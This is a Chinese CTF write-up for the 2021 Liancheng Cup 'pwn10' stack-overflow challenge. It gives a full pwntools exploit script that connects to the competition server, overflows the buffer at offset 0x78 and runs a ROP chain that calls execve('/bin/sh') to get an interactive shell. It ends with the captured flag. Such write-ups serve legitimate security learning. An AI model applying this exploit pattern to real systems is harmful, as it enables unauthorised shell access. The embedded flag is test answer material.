网络安全|2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)
2021年“莲城杯”网络安全大赛-PWN-pwn10(三血) 题目名称:pwn10
题目内容:栈溢出。靶机:nc 183.129.189.60 10016
题目分值:100.0
题目难度:容易
相关附件:pwn10的附件.zip
解题思路:
1.保护机制,静态链接,没pie 【网络安全|2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)】
文章图片
2.主要函数 
文章图片
文章图片
3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall
```python
#!/usr/bin/env python
from pwn import *local = 0
debug = 1
binary = "./pwn10"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"if local:
p = process(binary)
libc = ELF(lib)
else :
p = remote("183.129.189.60","10016")
# lib = "./libc.so.6"
libc = ELF(lib)s= lambda buf: p.send(buf)
sl= lambda buf: p.sendline(buf)
sa= lambda delim, buf : p.sendafter(delim, buf)
sal= lambda delim, buf : p.sendlineafter(delim, buf)
sh= lambda: p.interactive()
r= lambda n=None: p.recv(n)
ru= lambda delim: p.recvuntil(delim)
r7f= lambda: u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
trs= lambda addr: libc.address+addr
gadget = lambda ins: libc.search(asm(ins,arch="amd64")).next()
tohex= lambda buf: "".join("\\x%02x"%ord(_) for _ in buf)rop = ""
rop += p64(0x00000000004016e6) # 0x00000000004016e6: pop rdi;
ret;
rop += p64(0x00000000006ccd60)
rop += p64(0x0000000000401807) # 0x0000000000401807: pop rsi;
ret;
rop += p64(0x0000000000000000)
rop += p64(0x0000000000442d16) # 0x0000000000442d16: pop rdx;
ret;
rop += p64(0x0000000000000000)
rop += p64(0x000000000041f884) # 0x000000000041f884: pop rax;
ret;
rop += p64(0x000000000000003b)
rop += p64(0x00000000004679a5) # 0x00000000004679a5: syscall;
ret;
raw_input()
payload = "/bin/sh\x00"
payload += "A"*0x70
payload += rop
payload += "A"*0x100sl(payload)
sh()
# DASCTF{c7d94ca4c9a02a430d8c677cbaea192b}
推荐阅读
- 野营记-第五章|野营记-第五章 讨伐梦魇兽
- 艾略特的交易法则“遵循自然规律”
- 闲杂“细雨”
- “成长”读书社群招募
- 上班后阅读开始变成一件奢侈的事
- “精神病患者”的角度问题
- 说的真好
- 2021-02-10(找不回的“年味”……)
- “不完美,才美”01(190410)
- 火锅